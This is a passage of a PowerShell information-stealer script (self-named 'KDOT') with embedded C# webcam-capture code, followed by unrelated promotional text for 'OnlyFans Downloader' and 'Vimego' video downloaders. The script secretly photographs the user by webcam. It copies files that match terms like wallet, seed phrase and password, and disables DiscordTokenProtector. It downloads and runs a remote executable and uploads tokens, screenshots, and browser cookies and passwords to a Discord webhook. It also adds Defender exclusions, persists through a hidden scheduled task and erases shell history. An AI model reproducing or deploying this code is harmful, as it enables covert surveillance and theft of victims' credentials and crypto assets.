[DllImport("user32", EntryPoint = "SendMessageA")]
protected static extern int SendMessage(int hwnd, int wMsg, int wParam, [MarshalAs(UnmanagedType.AsAny)] object lParam);
[DllImport("user32")]
protected static extern int SetWindowPos(int hwnd, int hWndInsertAfter, int x, int y, int cx, int cy, int wFlags);
[DllImport("user32")]
protected static extern bool DestroyWindow(int hwnd);
int index;
int deviceHandle;
public Device(int index)
{
this.index = index;
}
private string _name;
public string Name
{
get { return _name; }
set { _name = value; }
}
private string _version;
public string Version
{
get { return _version; }
set { _version = value; }
}
public override string ToString()
{
return this.Name;
}
public void Init(int windowHeight, int windowWidth, int handle)
{
string deviceIndex = Convert.ToString(this.index);
deviceHandle = capCreateCaptureWindowA(ref deviceIndex, WS_VISIBLE | WS_CHILD, 0, 0, windowWidth, windowHeight, handle, 0);
if (SendMessage(deviceHandle, WM_CAP_DRIVER_CONNECT, this.index, 0) > 0)
{
SendMessage(deviceHandle, WM_CAP_SET_SCALE, -1, 0);
SendMessage(deviceHandle, WM_CAP_SET_PREVIEWRATE, 0x42, 0);
SendMessage(deviceHandle, WM_CAP_SET_PREVIEW, -1, 0);
SetWindowPos(deviceHandle, 1, 0, 0, windowWidth, windowHeight, 6);
}
}
public void ShowWindow(global::System.Windows.Forms.Control windowsControl)
{
Init(windowsControl.Height, windowsControl.Width, windowsControl.Handle.ToInt32());
}
public void CopyC()
{
SendMessage(this.deviceHandle, WM_CAP_EDIT_COPY, 0, 0);
}
public void Stop()
{
SendMessage(deviceHandle, WM_CAP_DRIVER_DISCONNECT, this.index, 0);
DestroyWindow(deviceHandle);
}
}
public class DeviceManager
{
[DllImport("avicap32.dll")]
protected static extern bool capGetDriverDescriptionA(short wDriverIndex,
[MarshalAs(UnmanagedType.VBByRefStr)]ref String lpszName,
int cbName, [MarshalAs(UnmanagedType.VBByRefStr)] ref String lpszVer, int cbVer);
static ArrayList devices = new ArrayList();
public static Device[] GetAllDevices()
{
String dName = "".PadRight(100);
String dVersion = "".PadRight(100);
for (short i = 0; i < 10; i++)
{
if (capGetDriverDescriptionA(i, ref dName, 100, ref dVersion, 100))
{
Device d = new Device(i);
d.Name = dName.Trim();
d.Version = dVersion.Trim();
devices.Add(d);
}
}
return (Device[])devices.ToArray(typeof(Device));
}
public static Device GetDevice(int deviceIndex)
{
return (Device)devices[deviceIndex];
}
}
}
"@
Add-Type -AssemblyName System.Drawing
$jpegCodec = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() |
Where-Object { $_.FormatDescription -eq "JPEG" }
Add-Type -TypeDefinition $source -ReferencedAssemblies System.Windows.Forms, System.Data, System.Drawing | Out-Null
try {
#region Import the Assemblies
[reflection.assembly]::loadwithpartialname("System.Windows.Forms") | Out-Null
[reflection.assembly]::loadwithpartialname("System.Drawing") | Out-Null
#endregion
$picCapture = New-Object System.Windows.Forms.PictureBox
try {
$devices = [WebCamLib.DeviceManager]::GetAllDevices()
} catch {
Write-Host "No camera found"
exit
}
$count = 0
foreach ($device in $devices) {
$imagePath = "$folder_general\out$count.jpg"
$device.ShowWindow($picCapture)
$device.CopyC()
$bitmap = [Windows.Forms.Clipboard]::GetImage()
$bitmap.Save($imagePath, $jpegCodec, $ep)
$bitmap.dispose()
$count++
[Windows.Forms.Clipboard]::Clear()
}
} catch {
Write-Host "No camera found"
exit
}
}
try {Get-WebCamImage} catch {}
Function Invoke-GrabFiles {
$grabber = @(
"2fa",
"acc",
"account",
"backup",
"backupcode",
"bitwarden",
"code",
"coinbase",
"crypto",
"dashlane",
"default",
"discord",
"disk",
"eth",
"exodus",
"facebook",
"fb",
"keepass",
"keepassxc",
"keys",
"lastpass",
"login",
"mail",
"memo",
"metamask",
"nordpass",
"pass",
"paypal",
"private",
"pw",
"recovery",
"remote",
"secret",
"seedphrase",
"wallet seed",
"server",
"syncthing",
"token",
"wal",
"wallet"
)
$dest = $important_files
$paths = "$env:userprofile\Downloads", "$env:userprofile\Documents", "$env:userprofile\Desktop"
[regex] $grab_regex = "(" + (($grabber |ForEach-Object {[regex]::escape($_)}) -join "|") + ")"
(Get-ChildItem -path $paths -Include "*.pdf","*.txt","*.doc","*.csv","*.rtf","*.docx" -r | Where-Object Length -lt 5mb) -match $grab_regex | Copy-Item -Destination $dest -Force
}
Invoke-GrabFiles
$items = Get-ChildItem -Path "$folder_general" -Filter out*.jpg
foreach ($item in $items) {
$name = $item.Name
curl.exe -F "payload_json={\`"username\`": \`"KDOT\`", \`"content\`": \`":hamsa: **webcam**\`"}" -F "file=@\`"$folder_general\$name\`"" $webhook | out-null
Remove-Item -Path "$folder_general\$name" -Force
}
Set-Location "$env:LOCALAPPDATA\Temp"
$token_prot = Test-Path "$env:APPDATA\DiscordTokenProtector\DiscordTokenProtector.exe"
if ($token_prot -eq $true) {
Stop-Process -Name DiscordTokenProtector -Force
Remove-Item "$env:APPDATA\DiscordTokenProtector\DiscordTokenProtector.exe" -Force
}
$secure_dat = Test-Path "$env:APPDATA\DiscordTokenProtector\secure.dat"
if ($secure_dat -eq $true) {
Remove-Item "$env:APPDATA\DiscordTokenProtector\secure.dat" -Force
}
try {
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'Discord' -Force -ErrorAction SilentlyContinue | Out-Null
} catch {}
(New-Object System.Net.WebClient).DownloadFile("https://github.com/ChildrenOfYahweh/Powershell-Token-Grabber/releases/download/V4.2/main.exe", "$env:LOCALAPPDATA\Temp\main.exe")
Stop-Process -Name "discord" -Force -ErrorAction SilentlyContinue | Out-Null
Stop-Process -Name "discordcanary" -Force -ErrorAction SilentlyContinue | Out-Null
Stop-Process -Name "discordptb" -Force -ErrorAction SilentlyContinue | Out-Null
$proc = Start-Process $env:LOCALAPPDATA\Temp\main.exe -ArgumentList "$webhook" -NoNewWindow -PassThru
$proc.WaitForExit()
$main_temp = "$env:LOCALAPPDATA\Temp"
curl.exe -F "payload_json={\`"username\`": \`"KDOT\`", \`"content\`": \`":hamsa: **Screenshot**\`"}" -F "file=@\`"$main_temp\desktop-screenshot.png\`"" $webhook | out-null
Move-Item "$main_temp\tokens.txt" $folder_general -Force
Move-Item "$main_temp\desktop-screenshot.png" $folder_general -Force
Move-Item -Path "$main_temp\browser-cookies.txt" -Destination "$browser_data" -Force
Move-Item -Path "$main_temp\browser-history.txt" -Destination "$browser_data" -Force
Move-Item -Path "$main_temp\browser-passwords.txt" -Destination "$browser_data" -Force
#remove empty dirs
do {
$dirs = Get-ChildItem $folder_general -directory -recurse | Where-Object { (Get-ChildItem $_.fullName).count -eq 0 } | Select-Object -expandproperty FullName
$dirs | Foreach-Object { Remove-Item $_ }
} while ($dirs.count -gt 0)
Compress-Archive -Path "$folder_general" -DestinationPath "$env:LOCALAPPDATA\Temp\KDOT.zip" -Force
curl.exe -X POST -F 'payload_json={\"username\": \"KDOT\", \"content\": \"\", \"avatar_url\": \"https://i.postimg.cc/k58gQ03t/PTG.gif\"}' -F "file=@$env:LOCALAPPDATA\Temp\KDOT.zip" $webhook
Remove-Item "$env:LOCALAPPDATA\Temp\KDOT.zip" -Force
Remove-Item "$folder_general" -Force -Recurse
Remove-Item "$main_temp\main.exe" -Force
}
function Invoke-TASKS {
Add-MpPreference -ExclusionPath "$env:LOCALAPPDATA\Temp"
Add-MpPreference -ExclusionPath "$env:APPDATA\KDOT"
New-Item -ItemType Directory -Path "$env:APPDATA\KDOT" -Force
# Hidden Directory
$KDOT_DIR = get-item "$env:APPDATA\KDOT" -Force
$KDOT_DIR.attributes = "Hidden", "System"
Copy-Item -Path $PSCommandPath -Destination "$env:APPDATA\KDOT\KDOT.ps1" -Force
$task_name = "KDOT"
$task_action = New-ScheduledTaskAction -Execute "mshta.exe" -Argument 'vbscript:createobject("wscript.shell").run("PowerShell.exe -ExecutionPolicy Bypass -File %appdata%\KDOT\KDOT.ps1",0)(window.close)'
$task_trigger = New-ScheduledTaskTrigger -AtLogOn
$task_settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -RunOnlyIfNetworkAvailable -DontStopOnIdleEnd -StartWhenAvailable
Register-ScheduledTask -Action $task_action -Trigger $task_trigger -Settings $task_settings -TaskName $task_name -Description "KDOT" -RunLevel Highest -Force
Backup-Data
}
if (Invoke-Admin_Check -eq $true) {
if (!($debug_mode)) {
Hide-Console
}
try {
Remove-Item (Get-PSreadlineOption).HistorySavePath -Force -ErrorAction SilentlyContinue
} catch {}
Compare-Mutex
# Self-Destruct
# Remove-Item $PSCommandPath -Force
if ($debug_mode) {
Start-Sleep -s 10000
}
} else {
Write-Host ("Please run as admin!") -ForegroundColor Red
Start-Sleep -s 1
Request-Admin
}
OnlyFans Downloader
Fast Media DownloaderDownload images and videos from OnlyFans quickly and easily.
- ⚡ Fast Downloads
- 📦 Bulk Download Supported
- 🎥 Images & Videos
Vimego
Universal Video DownloaderDownload videos from Vimeo, DailyMotion, OFTV, etc.
- ⚡ Fast & Reliable
- ✨ High Quality Formats
- 😎 Easy One-Click Download